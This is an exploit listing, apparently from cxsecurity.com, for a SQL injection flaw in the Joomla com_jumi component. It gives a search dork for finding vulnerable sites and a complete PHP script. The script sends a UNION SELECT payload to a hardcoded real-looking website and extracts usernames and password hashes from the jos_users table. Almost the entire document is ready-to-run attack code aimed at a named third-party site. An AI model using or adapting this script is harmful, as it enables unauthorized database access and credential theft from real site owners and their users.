Joomla com_jumi - SQL Injection Exploit

Published
Credit
Risk
2017.02.25
Mateus Lino
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:com_jumi index of

<?php
#Author: Mateus a.k.a Dctor - Hatbash br
#fb : facebook.com/hatbashbr/


$host = "http://www.building.lv/";
$payload = "index.php?option=com_jumi&fileid=2&Itemid=4+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/jos_users+--+";
$u = $host.$payload;
$random= array(
'http'=>array(
'method'=>"GET",
'header'=>"Accept-language: en\r\n" .
"Cookie: foo=bar\r\n" .
"User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051008 Fedora/1.5-0.5.0.beta2 Firefox/1.4.1\r\n" ));
$agent= stream_context_create($random);
$p = file_get_contents($u, false, $agent);
if(preg_match_all('/([0-9a-fA-F]{32})/', $p, $r)){
$string = implode(", ", $r['0']);
echo "[+] Target: ".$host ."\n";
echo "[+] Passwords :\n";
echo "\�33[01;31m" .$string. "\n";

}
else{echo "Not Vull";}
?>


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com